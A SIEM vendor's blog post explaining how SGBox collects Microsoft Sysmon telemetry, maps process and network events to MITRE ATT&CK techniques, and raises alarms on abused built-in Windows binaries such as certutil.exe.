Identify attacks with Sysmon, MITRE ATT&CK and company SIEM

To identify a targeted attack within your MS computer systems, you need to have visibility of possible indicators of compromise (IoC), collecting qualified information from endpoints, where most of the targeted attacks are concentrated. Endpoints are targeted for various reasons: they are the user’s access point to business information, they can be used to identify privileged credentials (credential dumping techniques), they are often used by non-experienced users with access to personal data (increasingly sophisticated phishing techniques are accompanied by software vulnerabilities). Furthermore, by exploiting web browser vulnerabilities or the lack of advanced prevention tools, some techniques may help circumvent perimeter controls (i.e. spear phishing via service attacks).

Endpoint protection tools (belonging to the preventive control sphere) can be ineffective in identifying modern attacks. For this reason, most vendors have introduced more sophisticated tools that use behavioral analysis and machine learning platforms to process the telemetry of endpoint and generate alarms automatically. Endpoint Detection and Response (EDR) solutions have been created but, while offering many advantages, represent an additional cost to the company. Most EDRs also require IT personnel to operate through a new console, to highlight the anomalies reported by the instrument. Why not use the SIEM platform already adopted to centralize compromise and attack indicators and highlight risk scenarios? Why not use a free tool to get telemetry from Microsoft Windows endpoints?

As a supplier of a SIEM solution, in SGBox we decided to respond to these needs by integrating the information generated by a tool that Microsoft makes available for free: System Monitor (Sysmon). Sysmon (freely downloadable at https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) is a software component (device driver) that, installed as a Windows service, allows you to monitor and track system activities by saving them in the Event Log. The data collected by Sysmon significantly increases Windows audit capabilities, allowing you to gather detailed information about processes, but also about network traffic (such as DNS queries created through programs run on endpoints, ports used) and file changes (allowing the discovery of timestomping techniques used by groups such as APT28 and more generally by the malware).

As a supplier of a SIEM solution, SGBox decided to respond to these needs by collecting and integrating specific information generated by Microsoft systems.

System Monitor (Sysmon) is a free Microsoft software component that, installed as a Windows service, allows you to monitor and track system activities by saving them in the Windows event log. The data collected by the service significantly increases Windows audit capabilities, allowing you to gather detailed information about processes, but also about network traffic (such as DNS queries sent by an application).

Process information is enriched by other details such as a hash (SHA1), the Globally Unique Identifier (GUID) of the process, the session GUID and other related processes. The collection of this data in the fully configurable SGBox SIEM allows both the visualization of anomalies within dedicated dashboards and the creation of automatic rules to generate different type of alarms (from email to Telegram message, up to possible interaction via API with a third-party solution).

Sysmon can be configured with an XML file that allows you to determine which items to monitor. There are a number of freely usable models on GitHub (the most popular is probably the one from SwiftonSecurity: https://github.com/SwiftOnSecurity/sysmon-config). SGBox, however, decided to suggest Olaf Hartong’s sysmon-modular (available here: https://github.com/olafhartong/sysmon-modular), because it effectively maps possible attack techniques with Tactics, Techniques and Procedures (TTP) of the MITRE ATT&CK framework (https://attack.mitre.org/). The following screenshot shows the information obtained from running the “net user” command in Windows:

In the example given, Sysmon allowed the command to associate with the T1018 (Remote System Discovery, https://attack.mitre.org/techniques/T1018/) technique, including information about the parent processes, the in which you ran the command, file version, and much more.

ATT&CK catalogues the modus operandi of attackers (pre and post-compromise phases) starting from real cases, defines common terminology and is widespread in many security products (including EDR). After installing Sysmon on endpoints equipped with SGBox agent, data is collected in the log management platform in a dedicated class (“Windows Sysmon”) and interpreted through patterns that allow recognition of event categories produced by the Microsoft device driver. Examples are: DNS query, driver loaded, file created, process creation, registry event create/delete, WMI event.

In addition to event recognition, SGBox allows the identification of commands normally used by fileless techniques. These are programs (called Living Off The Land Binary and Scripts or LOLBAS in jargon), usually present in the operating system, lend themselves to abuse and can be used for malicious actions. A typical example of this is the Windows certutil.exe command, as reported by MITRE at the following address: https://attack.mitre.org/software/S0160/. You can use certutil.exe legitimately to view certification authority (CA) configuration information or verify certificates in the operating system, but also abuse them for bypass preventive tool checks, access external resources, and install root certificates in browsers to be used for man-in-the-middle attacks.

Blacklists can be updated with programs used in their own reality, in order to improve process monitoring and reduce false positives. Statistics are represented in two dashboards: the first one with the details of the processes detected and the mapping with the techniques of the MITRE ATT&CK; the second one with the information regarding the connections of network (DNS traffic and related processes). An example is given in the following image:

The indication of the techniques of MITRE ATT&CK related to the processes detected (not necessarily malicious) allow to deepen the analysis. Correlation rules allow you to reduce false positives. An example is given in the following image (detail of the job dashboard containing statistics on TTP detected in a certain time interval):

When suspicious actions are detected (LOLBAS commands, running a PowerShell script, etc.), it is naturally possible to associate automatic correlation rules to generate alarms of various types.

By integrating Sysmon information and detailed MITRE ATT&CK techniques, SGBox offers the customers a convenient way to identify possible risk scenarios related to Windows platforms, reducing false positives and the complexity of the IT infrastructure.


Giorgio di Grazia

Technical Account Manager at SGBox